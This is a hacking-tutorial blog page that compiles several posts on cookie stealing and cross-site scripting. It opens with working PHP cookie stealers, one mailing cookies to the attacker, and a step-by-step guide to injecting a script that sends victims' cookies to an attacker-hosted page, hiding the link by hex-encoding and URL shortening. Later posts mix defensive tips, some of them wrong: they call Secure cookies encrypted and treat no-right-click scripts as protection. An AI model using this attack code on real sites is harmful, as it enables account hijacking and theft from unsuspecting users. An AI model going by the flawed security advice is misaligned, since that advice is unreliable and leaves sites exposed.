Showing posts with label Hacking Tutorials. Show all posts

How to make a cookie stealer in PHP? ~ get it via email


Here is the simple cookie stealer code:
Cookie saved to a file:
<?php
$cookie = $HTTP_GET_VARS["cookie"];
$steal = fopen("cookiefile.txt", "a");
fwrite($steal, $cookie ."\n");
fclose($steal);
?>
$cookie = $HTTP_GET_VARS["cookie"]; grabs the cookie from the current URL (stealer.php?cookie=x) and stores it in the $cookie variable.

$steal = fopen("cookiefile.txt", "a"); opens cookiefile.txt in append mode so that we can append the stolen cookie.

fwrite($steal, $cookie ."\n"); writes the stolen cookie to the file.

fclose($steal); closes the opened file.

Another version: sends the cookies to the hacker's email
 
<?php
$cookie = $HTTP_GET_VARS["cookie"]; mail("hackerid@mailprovider.com", "Stolen Cookies", $cookie);
?>
The above code will email the cookies to the hacker's email address using PHP's mail() function with the subject "Stolen Cookies".

Third Version
<?php
function GetIP()
{
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
        $ip = getenv("HTTP_CLIENT_IP");
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
        $ip = getenv("REMOTE_ADDR");
    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
        $ip = $_SERVER['REMOTE_ADDR'];
    else
        $ip = "unknown";
    return($ip);
}
function logData()
{
    $ipLog="log.txt";
    $cookie = $_SERVER['QUERY_STRING'];
    $register_globals = (bool) ini_get('register_globals');
    if ($register_globals) $ip = getenv('REMOTE_ADDR');
    else $ip = GetIP();

    $rem_port = $_SERVER['REMOTE_PORT'];
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    $rqst_method = $_SERVER['REQUEST_METHOD'];
    $rem_host = $_SERVER['REMOTE_HOST'];
    $referer = $_SERVER['HTTP_REFERER'];
    $date=date ("l dS of F Y h:i:s A");
    $log=fopen("$ipLog", "a+");

    if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie <br>");
    else
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie \n\n");
    fclose($log);
}
logData();
?>
The above cookie stealer will store the following information:
IP address
port number
host (usually the computer name)
user agent
cookie

This content is for educational purposes only, published for ethical hackers. This information is for creating awareness about Internet threats.

How to do Cookie Stealing with a Cross Site Scripting Vulnerability? : XSS Tutorials



If anyone tries these hacks against any company or anyone else, that makes him a trespasser of their security measures and brings him under legal justice. This tutorial is for the enhancement of security and for pentesting and research by legal security organizations.

Requirements:
A cookie stealer code: get it from here
Free web hosting service
Basic knowledge about XSS
Basic knowledge about computer cookies
Cookie stealing is the process of exploiting an XSS vulnerability (non-persistent or persistent) and grabbing the cookie from the victim who visits the infected link. These cookies will then be used to compromise their accounts.

Step 1: Creating the Cookie Stealer PHP file
Get the cookie stealer from the link I mentioned. In that post, I have described three versions of the cookie stealer. We are going to use the third version.
Copy the code.
Open Notepad and paste the code.
Save the file with a .php extension.
Eg: Stealer.php
Now create a new file and save it as log.txt (leave it blank). Don't change the name; this is the filename we gave in the PHP file.

Now you will have two files:
1. Stealer.php
2. log.txt

What exactly do these two files do?
The above Stealer.php file gets the IP address and cookie and stores the information in the log.txt file.
log.txt holds the cookies and IP address information.

Step 2:
Register at a free web hosting service and log in to your cPanel.
Now open the File Manager in cPanel.
Upload Stealer.php and log.txt to the root directory or the public_html directory.

Now the stealer will be at hxxp://www.YourSite.com/Stealer.php .

Step 3: Exploiting the XSS Vulnerability
So far, we have sharpened our saw. Now we are going to use it.
Once you have set up everything and found a vulnerable website, inject the following code into the vulnerable website.

<script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>
For example:
hxxp://www.VulnerableSite.com/index.php?search=<script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>

Cookie Stealing with Non-Persistent vs Persistent XSS:
Persistent: if you inject this code into a persistent XSS vulnerable website, it will stay there permanently until the administrator discovers it. It will be shown to all users. So attackers don't need to send any link to others. Whoever visits the page will be a victim.

Non-Persistent:
In the case of a non-persistent attack, the attacker will send the link to victims. Whenever they visit the site, it will steal the cookie. Most websites are vulnerable to non-persistent XSS.

In the non-persistent case, attackers will send the injected link to victims.
For example:
hxxp://www.VulnerableSite.com/index.php?search=<script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>

The above link clearly reveals the script. Hackers can hex-encode this script so that the victim can't see it.
For Example:
hxxp://www.VulnerableSite.com/index.php?search=%3c%73%63%72%69%70%74%3e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%3a%2f%2f%77%77%77%2e%59%6f%75%72%73%69%74%65%2e%63%6f%6d%2f%53%74%65%61%6c%65%72%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%3c%2f%73%63%72%69%70%74%3e
Still, the link looks long. The attacker uses one more technique to hide the long URL, i.e. URL shortening services. There are lots of websites that shorten a long URL into a short one.

For example:
hxxp://www.tinyexample.com/twrwd63

Once the victim visits the site, his cookie will be saved in the log.txt file.

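From the defender's side, the procedure above leaves a trace in the web server's access log: the injected link, plain or hex-encoded, lands in the query string. The following added example (not from the original post) scans Common Log Format lines for that payload, percent-decoding each request first so the encoded variant from the post is caught as well. The log lines are constructed samples; the IP addresses and timestamps are made up.

```javascript
// Strings whose presence in a decoded query string marks a script-injection
// attempt of the kind shown in this post.
const INDICATORS = ['<script', 'document.cookie', 'location.href', 'javascript:'];

// Percent-decode until the text stops changing (at most 3 rounds) so a
// double-encoded payload is unwrapped too. '+' is treated as a space, as in
// query strings. A malformed sequence such as "100%" is returned untouched
// instead of throwing.
function fullyDecode(s) {
  let cur = s;
  for (let round = 0; round < 3; round++) {
    let next;
    try {
      next = decodeURIComponent(cur.replace(/\+/g, ' '));
    } catch (e) {
      break;
    }
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// Pull the client IP, timestamp and request target out of a Common Log Format line.
function parseLogLine(line) {
  const m = line.match(/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], target: m[4], status: Number(m[5]) };
}

// Scan every line and report those whose decoded query string carries an indicator.
function scanAccessLog(lines) {
  const findings = [];
  lines.forEach((line, idx) => {
    const req = parseLogLine(line);
    if (!req) return;
    const q = req.target.indexOf('?');
    if (q < 0) return;
    const rawQuery = req.target.slice(q + 1);
    const decoded = fullyDecode(rawQuery).toLowerCase();
    const hits = INDICATORS.filter((ind) => decoded.includes(ind));
    if (hits.length === 0) return;
    findings.push({
      line: idx + 1,
      ip: req.ip,
      time: req.time,
      // true when no indicator is visible before decoding, i.e. the payload was hex-encoded
      obfuscated: !INDICATORS.some((ind) => rawQuery.toLowerCase().includes(ind)),
      indicators: hits,
      snippet: decoded.slice(0, 60),
    });
  });
  return findings;
}

// Constructed sample log. Line 2 is the plain injected link, line 3 reuses the
// hex-encoded link from the post, line 4 is a double-encoded tag, line 5 is a
// harmless request with a malformed percent sequence.
const SAMPLE_LOG = [
  `203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?search=shoes HTTP/1.1" 200 512`,
  `203.0.113.7 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?search=<script>location.href='http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script> HTTP/1.1" 200 512`,
  `203.0.113.9 - - [10/Oct/2023:13:57:12 +0000] "GET /index.php?search=%3c%73%63%72%69%70%74%3e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%3a%2f%2f%77%77%77%2e%59%6f%75%72%73%69%74%65%2e%63%6f%6d%2f%53%74%65%61%6c%65%72%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%3c%2f%73%63%72%69%70%74%3e HTTP/1.1" 200 512`,
  `203.0.113.9 - - [10/Oct/2023:13:58:40 +0000] "GET /index.php?search=%253Cscript%253Ealert(1)%253C%252Fscript%253E HTTP/1.1" 200 512`,
  `203.0.113.11 - - [10/Oct/2023:13:59:02 +0000] "GET /index.php?search=100% HTTP/1.1" 200 512`,
];

console.log(JSON.stringify(scanAccessLog(SAMPLE_LOG), null, 2));
```

Matching on the decoded query rather than the raw one is the point: the raw hex-encoded line contains none of the indicator strings.
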
How to be protected from this attack?
Use the NoScript add-on. This is the best protection against XSS.
Never simply click a shortened URL.
Sometimes you may want to follow the shortened link. If so, then clear all cookies in your browser and visit through a proxy or VPN (it will hide your IP).

Protective measures against hacking


Possible solutions to Web page Vulnerabilities

Malicious hacking often takes mainly two things, time and software. This implies that most websites or applications are vulnerable in some way. But it also means that most flaws can be secured by time and software; for example, from the perspective of hacking, the difference between a five-digit password and an eight-digit password with a number is roughly 22,000 years. I mean by this that it would take a hacker, using some kind of dictionary attack program, around 22,000 years to find your password if it was eight alphanumeric characters. As a general rule, force your users into creating passwords of at least 8 characters and ask them kindly not to include words found in the dictionary. This is for your website's security as much as their own and that of your other users.
Web Forms
Web forms are an easy target for hackers or anyone who simply wants to break your applications, as the user is given the opportunity to pass data to your web server, which performs computations using that data.


Closely related to hidden field manipulation, buffer overruns are created in a similar fashion; any text input field with a maxchar=n property can be used to possibly shut down the server. The source code can be accessed, and the maxchar property removed. The hacker then enters, say, 10,000 ones and submits the form. What happens next? The server shuts down, taking your business with it. A semi-secure solution to this would again be to protect any HTML form source. A better solution would be to allocate memory dynamically, therefore not presetting the memory buffer to a certain size, or to write a function that checks the length of the input before passing the results to the server. If the input exceeds the memory allowance, simply pass back a NULL value.
A simple, yet effective technique in stopping hackers is to set up your web server to hand out specialised error 404 pages with a status of 200 when a resource is not found. Most genuine users will not even notice, and a hacker using software to scan for available resources will think they have come across a gold mine. When the hacker goes to check, they will find that they have been tricked and hopefully see analysing your site further as pointless. This could be seen as hacking the hackers, or the hacker becoming the hacked...
Netcat
You could take this one step further and use an old UNIX program called netcat to crash anyone who attempts to hack your site. Netcat makes and accepts TCP connections, but it can be used by a hacker for many things, such as gaining remote access to a shell, port scanning and even hijacking services and bypassing firewalls. It can also be used to monitor ports and flood suspicious requests, just like a buffer overrun, by using it to pretend you are running a service that you are not and using the 'yes' command when someone tries to exploit that service. Netcat is a powerful program in itself and is usually part of any self-respecting hacker's toolkit. Basically, you could look at this as hitting back first.
Conclusion I hope that I have drawn your attention to some of the more basic but often neglected entry points that a hacker may use to gain access to your web applications, and highlighted the need for basic auditing of the security management of your site.
This article is not designed to be a complete solution for protection against hacking, but more the starting point for your concerns. No website is completely hack-proof, but there are few websites that really need to be. As a web developer, your primary security concern is first to evaluate how much security you will actually need. The more secure you need to be, the more your aims will move toward hiring the services of a professional security solution.
PREVENTING HACKING ACTIVITY
The most well-known method of protection against hacking among personal home computer users is anti-virus software. Companies such as McAfee.com Corp. provide anti-virus software that scans a PC's hard drive for infected material, alerting users when bad files are found. Firewalls, typically used for computer networks, have also become popular with home users, particularly those who use always-on Internet connections such as cable modems and digital subscriber lines. Firewalls act as a barrier to hacking by shielding private networks from the public, thus keeping most strangers from tampering with PCs.
Other software options, mainly used to protect larger computer networks, include Intrusion Detection Systems (IDS), content filtering software, sandboxing software, and behaviour analysis software. IDS is considered one of the best security methods for large networks. With an IDS in place, system administrators can monitor network requests and identify large-scale malicious attacks. Content filtering software is advanced anti-virus software that reads compressed files and allows IT managers to set specific filtering parameters to block malicious email. Sandboxing software protects against malicious code. The software creates a protected space within a PC where suspicious code can run, before it has a chance to interact with the main operating system. Still in its infancy in 2001, behaviour analysis software protects PCs by monitoring entire networks and verifying every command of all functions.

Unfortunately, many malicious hackers see security software not as a barrier but as a simple hurdle to get over. However, as long as hacking attacks continue, both individuals and businesses will continue to spend money on applications and software designed to protect systems from unwanted visitors.

A Few Protective Measures
-If you use a web CMS, subscribe to the development blog.

-Update to new versions as soon as possible. Update all 3rd party modules as a matter of course; any modules including web forms or enabling member file uploads are a potential risk. Module vulnerabilities can give access to your full database.

-Harden your web CMS or publishing platform. For example, if you use WordPress, use this guide as a reference.

-If you have an admin login page for your custom-built CMS, why not call it 'Flowers.php' or something, instead of "AdminLogin.php" etc.?

-Enter some tricky data into your login fields like the sample injection string shown above, and anything else which you think might confuse the server. If you get an unusual error message disclosing server-generated code then this may betray a vulnerability.

-Do a few Google hacks on your name and your site. Just in case...

-Use a no-right-click script.
This stops easy copying of images and easy viewing of the source. Note: This can be circumvented by using Javascript.
-Use frames.
This stops viewing of the source from the top of the site. Note: This can be circumvented by using browser history.
-Encrypt the frames page.
-Encryption can stop hackers completely. By using several encryption programs, sources become unreadable. Note: Even encryption can be defeated.

How Do You Secure Your Network Against Hackers?


Network security is a serious matter. A network allows you to share information and resources, but it also lets computer viruses, human intruders, or even disgruntled employees do far more damage than they could on a single machine. Think about what would happen if every bit of data on your local area network (LAN) vanished, and you'll understand why security is so important.
Here is a brief list of safety measures to think about when you're setting up a LAN:
Virtual data still needs physical protection. This could mean keeping your server in a locked room, removing hard drives from workstations that don't need them, and installing an alarm system in your office. All the security software in the world won't stop someone from breaking into your office and carting off your computers.
Beware of bugs. Most computer viruses are just a nuisance, but it takes only one malicious virus to bring your network to its knees. Install reliable anti-virus software, keep it updated, and train your employees to use it. Consider other safety measures, such as installing only shrink-wrapped commercial software on your computers.
Network security is an everyday job. Stay on top of changes that could affect the security of your LAN. Keep your operating system updated with the latest security patches and bug fixes. Assign access to directories and other network resources on a need-to-have basis, and remove a user's account immediately when they leave your company. Use network logging and security testing to check your network for security holes and possible break-ins.


Pay attention to passwords. One bad password can compromise your entire network. Avoid passwords that contain dictionary words or personal information, and require users to change their passwords regularly. When an employee leaves the company, disable their password immediately as part of the termination process.
Don't let trouble come calling. Take special precautions if you connect your LAN to the outside world through a wireless hotspot at your local cafe or library. Prevent wireless attacks by using encrypted passwords or firewall software, which can come in the form of portable hardware, such as a USB dongle.
Install a software firewall. If you connect your LAN directly to the Internet, install a firewall to screen both inbound and outbound traffic. A software firewall like Zone Labs ZoneAlarm will also protect your network against malicious programs known as Trojan horses that let intruders get into and take over your PC.

Free Facebook ID Hacking E-book


Table of Contents:
1. Facebook Tips & Tricks
1.1. Facebook Tips
1.2. How to find your Facebook number
1.3. How to access Facebook from Gmail
1.4. Facebook emoticon codes
1.5. How to download Facebook to your PC...
1.6. Download your data
1.7. Import your publication into Facebook
1.8. How to find out if someone hacked your Facebook account
1.9. How to change your name on Facebook
1.10. Export the contacts of your Facebook account
1.11. How to create a Facebook ID card
1.12. How to hide your email address from Facebook apps
1.13. How to delete and deactivate a Facebook account
1.14. How to download a Facebook photo album
1.15. How to add a forum (discussion board) to a page
1.16. Facebook anti-virus
1.17. How to get Facebook fan page alerts in your email...
1.18. How to show who is online on Facebook after you are in offline mode...
1.19. How to send SMS using Facebook...
1.20. How to find new pages you might like
1.21. How to watch streaming TV on Facebook
1.22. How to create a map of your Facebook friends...
1.23. Cartoon image on Facebook
1.24. Colored text, bold, underline, smileys in Facebook status...
1.25. How to disable Facebook Timeline...
1.26. How to disable public search of your Facebook profile
1.27. How to post a blank status
1.28. How to browse blocked Facebook
2. Facebook Web Applications
2.1. How to schedule Facebook messages with Sendible
2.2. How to get Facebook updates in your email
2.3. How to update Facebook without using Facebook
2.4. How to be notified when a friend changes jobs
2.5. How to read Facebook profile history
2.6. How to turn Facebook status updates
2.7. How to find shared videos on Facebook
2.8. Catch the knowledge of your social network
2.9. Monitor your kid's Facebook activity
2.10. Manage your personal & professional image
2.11. How to track Facebook activities
2.12. Create a mosaic profile image on Facebook
2.13. Online store on Facebook
2.14. Online Facebook Messenger...
2.15. How to search Facebook fan pages...
2.16. How to find out who unfriended you
2.17. How to download videos from Facebook
2.18. How to create a slideshow of your Facebook album
2.19. How to create a custom Facebook tab
2.20. How to get Facebook in Excel
2.21. How to connect Google Docs to Facebook
3. Facebook Software & Plug-ins
3.1. Facebook Color Filter
3.2. Facebook ads blocker
3.3. How to connect Facebook, Twitter & Google
3.4. Facebook Toggle all
3.5. How to Facebook chat on your PC with Adium
3.6. Facebook based software
3.7. Facebook email notifier
3.8. How to connect Outlook to Facebook

4. Facebook Hacking & Security
4.1. Facebook phishing
4.2. Facebook password Decryptor
4.3. Software Pass View...
4.4. How to hack Facebook using a keylogger
4.5. How to hack a password using Facebook Hacker
4.6. How to delete your friend's account within twenty four hours
4.7. How to protect your Facebook account from hacking
4.8. How to protect yourself from keylogger & phishing attacks


What are Computer/Browser Cookies? ~ Use of Cookies

What are Cookies?
HTTP cookies, or web browser cookies, are used to store details about visitors. Cookies are also used to store login information (username, passwords). They are useful for tracking visitors' preferences so that the appropriate details or ads can be displayed.

Different Kinds of Cookies:
Session cookie
A session cookie lasts up to a certain time, depending on the website. After the session time, it will be destroyed.


Persistent Cookie
A persistent cookie will outlast user sessions. If a persistent cookie has its Max-Age set to 1 year, then, within the year, the initial value set in that cookie would be sent back to the server every time the user visited the server. This could be used to record a vital piece of information such as how the user initially came to this website. For this reason, persistent cookies are also called tracking cookies or in-memory cookies.

Secure cookie
Secure cookies are encrypted cookies. If you use HTTPS (secure connection), then it will store the cookies in encrypted form. Even if hackers steal the cookie, they are able to see only the encrypted data.
Example:
Bank sites always use Secure cookies.

HttpOnly cookie
The HttpOnly cookie is supported by most modern browsers. On a supporting browser, an HttpOnly session cookie will be used only when transmitting HTTP (or HTTPS) requests, thus restricting access from other, non-HTTP APIs (such as JavaScript). This restriction mitigates but does not eliminate the threat of session cookie theft via Cross-site scripting. It is essential to recognise that this feature applies only to session-management cookies, and not to other browser cookies.

Third-party cookie
Third-party cookies are cookies stored under another domain.
For Example:
www.example.com stores the cookies under ad.advertise12.com
At the same time, another website also sets cookies under the same domain:
www.othersite.com stores the cookies under ad.advertise12.com

Supercookie
A "supercookie" is a cookie with a public suffix domain, like .com, .co.in, .in.

Most browsers, by default, allow first-party cookies, i.e. a cookie whose domain is the same as, or a parent domain of, the requesting host. For example, a user visiting www.example.com can have a cookie set with domain www.example.com or .example.com, but not .com. A supercookie with domain .com would be blocked by browsers; otherwise, a malicious website, like attacker.com, could set a supercookie with domain .com and potentially disrupt or impersonate legitimate user requests to example.com.

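The Secure, HttpOnly and Domain rules above can be turned into a simple audit of a Set-Cookie header. The following is an added example, not from the original post: it parses a header, flags a missing Secure or HttpOnly attribute, and applies the domain-matching rule, rejecting a public-suffix Domain as a supercookie. One caveat the post does not state: the Secure attribute only stops the browser sending the cookie over plain HTTP; it does not encrypt the cookie value itself. The public suffix list here is a tiny constructed stand-in for the real one at publicsuffix.org, and all headers and hosts are made-up samples.

```javascript
// Constructed stand-in for the public suffix list: the suffixes named in the
// post plus a few more. A real audit loads the full list from publicsuffix.org.
const PUBLIC_SUFFIXES = new Set(['com', 'in', 'co.in', 'net', 'org']);

// Split "name=value; Attr; Attr=val" into its parts. Attribute names are
// case-insensitive, so they are lower-cased; attributes without a value
// (Secure, HttpOnly) are stored as true.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter((p) => p.length > 0);
  const eq = parts[0].indexOf('=');
  const cookie = {
    name: eq < 0 ? parts[0] : parts[0].slice(0, eq).trim(),
    value: eq < 0 ? '' : parts[0].slice(eq + 1).trim(),
    attrs: {},
  };
  for (const p of parts.slice(1)) {
    const i = p.indexOf('=');
    const key = (i < 0 ? p : p.slice(0, i)).trim().toLowerCase();
    cookie.attrs[key] = i < 0 ? true : p.slice(i + 1).trim();
  }
  return cookie;
}

// The browser rule described in the post: a Domain attribute is accepted only
// if it is the requesting host itself or a parent domain of it, and never a
// public suffix (that would be a supercookie). A leading dot is ignored.
function domainVerdict(domain, requestHost) {
  const d = domain.replace(/^\./, '').toLowerCase();
  const h = requestHost.toLowerCase();
  if (PUBLIC_SUFFIXES.has(d)) return 'supercookie';
  if (h === d || h.endsWith('.' + d)) return 'ok';
  return 'mismatch';
}

// Audit one Set-Cookie header as received from requestHost; returns the
// cookie name and a list of human-readable issues (empty when it is clean).
function auditSetCookie(header, requestHost) {
  const c = parseSetCookie(header);
  const issues = [];
  if (!('secure' in c.attrs)) {
    issues.push('missing Secure: the cookie will also be sent over plain HTTP');
  }
  if (!('httponly' in c.attrs)) {
    issues.push('missing HttpOnly: readable through document.cookie, so an XSS can exfiltrate it');
  }
  if (typeof c.attrs.domain === 'string') {
    const v = domainVerdict(c.attrs.domain, requestHost);
    if (v === 'supercookie') issues.push('supercookie: Domain ' + c.attrs.domain + ' is a public suffix');
    else if (v === 'mismatch') issues.push('Domain ' + c.attrs.domain + ' does not cover ' + requestHost);
  }
  return { name: c.name, issues };
}

// Constructed sample headers, as if returned by https://www.example.com/.
const SAMPLE_HEADERS = [
  'session=abc123; Path=/; Secure; HttpOnly',
  'prefs=dark; Path=/',
  'track=1; Domain=.com; Secure; HttpOnly',
  'id=9; Domain=.example.com; Secure; HttpOnly',
  'id=9; Domain=othersite.com; Secure; HttpOnly',
];

for (const h of SAMPLE_HEADERS) {
  console.log(JSON.stringify(auditSetCookie(h, 'www.example.com')));
}
```
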
Zombie cookie
A zombie cookie is any cookie that is automatically recreated after a user has deleted it. This is accomplished by a script storing the content of the cookie in some other place, such as the local storage available to Flash content, HTML5 storage and other client-side mechanisms, and then recreating the cookie from the backup stores when the cookie's absence is detected.

What is the use of Cookies?
Session management
Cookies may be used to maintain data related to the user during navigation, possibly across multiple visits. Cookies were introduced to provide a way to implement a "shopping cart" (or "shopping basket"), a virtual device into which users can store items they want to purchase as they navigate throughout the site.

Personalization
Cookies may be used to remember information about the user who has visited a website in order to show relevant content in the future. For example, a web server may send a cookie containing the username last used to log in to a website so that it may be filled in for future visits.

Tracking
Tracking cookies may be used to track internet users' web browsing habits. This can also be done in part by using the IP address of the computer requesting the page or the referrer field of the HTTP request header, but cookies allow for greater precision.

Self-XSS (Cross Site Scripting): Social Engineering Attack and Prevention (Facebook)



What is Self-XSS?
Self-XSS is one of the popular social engineering attacks used by attackers to trick users into pasting malicious code into the browser. It results in the attacker gaining access to whatever website you visit. Usually scammers use this attack to trick users into buying products or to make money through paid surveys.

Recently, hackers attacked Facebook with explicit adult images. Facebook says it might be a self-XSS attack.

Javascript can be executed from the browser's URL bar.
For example, enter the following code in your browser:
javascript:alert('BreakTheSecurity');
This will display a pop-up box with "BreakTheSecurity". An attacker can use this for malicious purposes. He can steal private information and cookies, redirect to malware websites and more.
For Eg:
Entering the following code will display the cookies in your browser:
javascript:alert("Cookies:"+document.cookie+"  "+"\n By \n BreakTheSecurity");

    The above code does nothing malicious other than showing the cookies. But an attacker can extend the script so that it takes advantage of your information.

    Security Tips from BreakTheSecurity:
    Use the NoScript add-on, which will prevent javascript from running in your browser.
    Don't simply click shortened URLs, for example: bit.ly/55ewEb?22. They may redirect to an infected website.
Be aware of social engineering:
If anyone asks you (even if he is your friend) to paste scripts into the browser bar, never make this mistake.
If anyone says "iPhone only $10", don't be desperate to click it.
If anyone says "1000 shares will cure a baby", never make this mistake. Facebook shares never help to get cash or help to cure a child.
God gave us the sixth sense; use it and think before you click any link or follow other instructions.

DOM Based Cross Site Scripting (XSS) Vulnerability Tutorial


What is DOM?
DOM stands for Document Object Model, which allows client-side scripts (e.g. Javascript) to dynamically access and modify the content, structure, and style of a web page.

Like server-side scripts, client-side scripts can also accept and manipulate user input with the help of the DOM.

Here is a very simple HTML page that accepts and writes user input using JavaScript with the help of the DOM.

<html>
<head>
</head>
<body>
    <script>
        var pos=document.URL.indexOf("BTSinput=")+9;  // finds the position of the value
        var userInput=document.URL.substring(pos,document.URL.length); // copies the value into the userInput variable
        document.write(unescape(userInput)); // writes the content to the webpage
    </script>
</body>
</html>

If you know HTML and Javascript, understanding the above code is easy.

In the above example, the javascript code gets the value from the URL parameter "BTSinput" and writes the value into our web page.

For example, if the URL is
               www.BreakThesecurity.com/PenTesting?BTSinput=default
the web page will show "default" as output.

Did you notice?! The content of the web page is not written by a server-side script. The client-side script changes the content dynamically depending on the input. Everything is done with the help of the DOM object 'document'.

DOM Based XSS vulnerability:
When a developer writes the content using a DOM object without sanitizing the user input, it allows an attacker to run his own code.

In the above example, we did not sanitize the input and simply displayed whatever value we got from the URL.

An attacker with malicious intent can inject an XSS vector instead. For example:

www.BreakThesecurity.com/PenTesting?BTSinput=<script>alert("BreakTheSec")</script>


As I said previously, the document.write function simply writes the value of the BTSinput parameter into the website. So it will write '<script>alert("BreakTheSec")</script>' into the website without sanitizing. This results in the script code running and shows the alert box.


Patching the DOM Based Cross Site Scripting Vulnerability
Audit all JavaScript code in use by your application to make sure that untrusted data is being escaped before being written into the document, evaluated, or sent as part of an AJAX request. There are a multitude of JavaScript functions and properties which must be protected, including some which are rather non-obvious:

The document.write() function
The document.writeln() function
The eval() function, which executes JavaScript code from a string
The execScript() function, which works in the same way as eval()
The setInterval(), setTimeout(), and navigate() functions
The .innerHTML property of a DOM element
Certain CSS properties which allow URLs such as .style, .backgroundImage, .listStyleImage, etc.
The event handler properties like .onClick, which take JavaScript code as their values

Any data which is derived from data under the user's control (e.g. request parameters, headers, query parameters, cookie names and values, the URL of the request itself, etc.) should be escaped before being used. Examples of user-controlled data include document.location (and most of its properties, e.g. document.location.search), document.referrer, cookie names and values, and request header names and values.

You can use the JavaScript built-in functions encode() or encodeURI() to handle your escaping. If you write your own escaping functions, be extremely careful. Rather than using a "black list" approach (where you filter dangerous characters and pass everything else through untouched), it is better to use a "white list" approach. A good white list approach is to escape everything by default and allow only alphanumeric characters through.

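To make the white list advice concrete, here is an added example (not from the original tutorial) that rebuilds the BTSinput sink two ways: the vulnerable form that mirrors the page's document.write(unescape(userInput)), and a hardened form that runs the decoded value through a white list escaper which lets only [A-Za-z0-9] through and turns every other character into a numeric HTML entity. Neither function touches a real DOM; each returns the HTML string that document.write would emit, so the two can be compared in Node.

```javascript
// White list escaper: only ASCII letters and digits pass through untouched;
// everything else becomes a numeric character reference (&#NN;), so no
// character that can open a tag, close an attribute or start a script survives.
function escapeHtmlWhitelist(s) {
  let out = '';
  for (const ch of s) {
    if (/^[A-Za-z0-9]$/.test(ch)) out += ch;
    else out += '&#' + ch.codePointAt(0) + ';';
  }
  return out;
}

// Extract the BTSinput value exactly as the tutorial does: everything after
// "BTSinput=" (9 characters), or an empty string when the parameter is absent.
function getBtsInput(url) {
  const pos = url.indexOf('BTSinput=');
  if (pos < 0) return '';
  return url.substring(pos + 9);
}

// Vulnerable sink: the same logic as the tutorial page. The decoded value goes
// straight into the markup. (unescape is deprecated; it is kept to match the page.)
function renderUnsafe(url) {
  return unescape(getBtsInput(url));
}

// Hardened sink: decode first, then escape before anything reaches the page.
// In a browser, assigning to element.textContent instead of calling
// document.write would be the other safe option, since textContent never parses HTML.
function renderSafe(url) {
  return escapeHtmlWhitelist(unescape(getBtsInput(url)));
}

// The two URLs from the tutorial, side by side.
const BENIGN_URL = 'www.BreakThesecurity.com/PenTesting?BTSinput=default';
const ATTACK_URL = 'www.BreakThesecurity.com/PenTesting?BTSinput=<script>alert("BreakTheSec")</script>';

console.log('unsafe, benign :', renderUnsafe(BENIGN_URL));
console.log('unsafe, attack :', renderUnsafe(ATTACK_URL));
console.log('safe,   benign :', renderSafe(BENIGN_URL));
console.log('safe,   attack :', renderSafe(ATTACK_URL));
```

Note that the hardened output for "default" is unchanged, while the attack URL comes back as inert entity text that the browser renders as literal characters rather than a script element.
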
Combination Website Scripting(XSS) Finish Guide for Beginners~ Web Program Vulnerability



What is XSS?
Cross Site Scripting also known as XSS , is one of the most typical web appliction weeknesses that allows an enemy to run his own customer part scripts(especially Javascript) into web pages viewed by other customers.


In a typical XSS attack, a hacker injects his malicious JavaScript code into a legitimate website. When a user visits the specially crafted link, the malicious JavaScript executes in the user's browser. A successfully exploited XSS vulnerability allows attackers to carry out phishing attacks, steal accounts and even deliver malware.
Example: Suppose a hacker has found an XSS vulnerability in Gmail and injects a malicious script. When you visit the page, the malicious script executes. It can be used to redirect you to a fake Gmail login page or to capture your cookies. With the stolen cookies, the attacker can log in to your account and change the password.
XSS will be easy to understand if you have the following prerequisites:
Strong knowledge of HTML and JavaScript (Reference).
Basic knowledge of HTTP client-server architecture (Reference)
[optional] Basic knowledge of server-side programming (PHP, ASP, JSP)

XSS Attack:
Step 1: Discovering Insecure Website
Hackers use Google dorks such as "?search=" or ".php?q=" to find vulnerable websites. Skilled attackers (1337) target specific websites instead of relying on search. If you are going to test your own site, you have to check every page on the site for the vulnerability.

Step 2: Testing the Vulnerability:
First of all, we have to find an input field through which we can inject our own script, for example: the search box, username, password or any other input field.


Test 1 :
Once we have found the input field, let us try entering some string, for example "BTS". It will display the result.

Now right-click on the page and select View Source. Search for the string "BTS" which we entered in the input field. Note the location where the input is placed.


Test 2:
Now we are going to check whether the server sanitizes our input or not. To do this, let us enter the <script> tag in the input field.
 

View the source of the page. Find the location where the input was displayed in the previous test.

If our code is not being sanitized by the server, it appears in the source exactly as we entered it. If the server sanitizes the input, it will look like &lt;script&gt; instead. An unsanitized reflection indicates that the website is vulnerable to XSS and we can execute our own scripts.

Step 3: Exploiting the vulnerability
